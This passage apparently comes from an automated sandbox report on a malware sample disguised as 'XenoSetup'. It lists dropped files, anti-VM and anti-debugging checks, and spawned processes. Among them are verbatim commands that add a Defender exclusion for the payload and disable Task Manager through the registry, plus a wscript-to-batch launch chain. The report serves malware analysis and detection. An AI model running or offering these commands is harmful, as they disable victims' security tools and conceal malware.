                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\paukoYZl.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\lmJukoKX.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZTxvzCno.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\WKMEYgAB.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\BcHAIFcQ.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\kEjDZxDz.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\uOpJsBHp.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\GyShWgyC.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\qodKYthi.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\vMsrqipz.logJump to dropped file
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\eLGexRyL.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\MPdHuBxA.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\bGOWfMqu.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\GpvhmufF.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\ItmQLqVf.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZSKNtyuw.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\remTNUPL.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\UfDWuYEk.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\LxMgmcSS.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe.exe (copy)Jump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\frbUEvTD.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\vcvJAqxW.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\Aqnqislq.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\xvoKkvvU.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\NpzpwslB.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\ARRIhAyp.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\ldZbGFkR.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\LuUydMov.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\PIQPERQj.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\pczkrlLQ.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\IlCyhHua.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\GGCzAPYH.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\ESyrPCdJ.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\TZhoQTpI.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\XOSeUCEW.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\NZUxJEKO.logJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeAPI coverage: 6.9 %
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe TID: 2188Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2996Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe TID: 1824Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe TID: 4552Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe TID: 4832Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe TID: 4068Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe TID: 6784Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe TID: 1832Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe TID: 3820Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe TID: 6128Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe TID: 3220Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exe TID: 6844Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FEA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,6_2_00FEA69B
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_0100B348 FindFirstFileExA,6_2_0100B348
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FFC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,6_2_00FFC220
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeCode function: 7_2_00007FF68D5ECD20 GetFileAttributesExW,GetFullPathNameW,GetFullPathNameW,_invalid_parameter_noinfo_noreturn,GetFileAttributesExW,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,FindFirstFileExW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,Concurrency::cancel_current_task,7_2_00007FF68D5ECD20
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FFE6A3 VirtualQuery,GetSystemInfo,6_2_00FFE6A3
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeThread delayed: delay time: 922337203685477
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeThread delayed: delay time: 922337203685477
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeThread delayed: delay time: 922337203685477
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeThread delayed: delay time: 922337203685477
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeThread delayed: delay time: 922337203685477
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeThread delayed: delay time: 922337203685477
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                      Source: XenoSetup(1).exe, 0000000A.00000003.2470518978.000000000082B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: wscript.exe, 00000011.00000002.2736851224.0000000003550000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G%
                      Source: XenoSetup(1).exe, 00000010.00000003.2555154788.0000000000D9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%0A
                      Source: XenoSetup(1).exe, 00000010.00000003.2555154788.0000000000D9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: NZdXlPbVdUubKXQ.exe, 00000020.00000002.2722151836.0000000000F98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@YS
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeAPI call chain: ExitProcess graph end nodegraph_6-25104
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FFF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00FFF838
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeCode function: 7_2_00007FF68D5ECB70 LoadLibraryA,GetProcAddress,_invalid_parameter_noinfo_noreturn,7_2_00007FF68D5ECB70
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_01007DEE mov eax, dword ptr fs:[00000030h]6_2_01007DEE
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_0100C030 GetProcessHeap,6_2_0100C030
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess token adjusted: Debug
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess token adjusted: Debug
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess token adjusted: Debug
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FFF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00FFF838
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FFF9D5 SetUnhandledExceptionFilter,6_2_00FFF9D5
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FFFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00FFFBCA
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_01008EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_01008EBD
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeCode function: 7_2_00007FF68D5F167C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF68D5F167C
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeCode function: 7_2_00007FF68D5F19C0 SetUnhandledExceptionFilter,7_2_00007FF68D5F19C0
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeCode function: 7_2_00007FF68D5F181C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF68D5F181C
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe'
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe'Jump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe'
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe'Jump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe "C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe" Jump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\Xeno.exe "C:\Users\user\AppData\Local\Temp\Xeno.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe" Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe" Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll/DriverbrokerCrtDhcp.exe"Jump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline"Jump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.cmdline"Jump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.cmdline"Jump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8dcADkVv20.bat" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portBrokerDll\Ac4k16M5JuZ3cBUzCeuZfRwt20LYrImECkDEo2qhe7JRV.bat" "
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4177.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCEACDD11852CD4DF0A8C4FA8867592994.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES436B.tmp" "c:\Users\user\AppData\Local\Temp\CSCF5A66DC0AE3041F58A3C1CE4B9A61B98.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES458E.tmp" "c:\Windows\System32\CSC3568A44F8D2D461ABD894E9C160B8C.TMP"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll\DriverbrokerCrtDhcp.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll/DriverbrokerCrtDhcp.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\portBrokerDll\DriverbrokerCrtDhcp.exe "C:\portBrokerDll/DriverbrokerCrtDhcp.exe"
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FFF654 cpuid 6_2_00FFF654
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: GetLocaleInfoW,GetNumberFormatW,6_2_00FFAF0F
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeQueries volume information: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
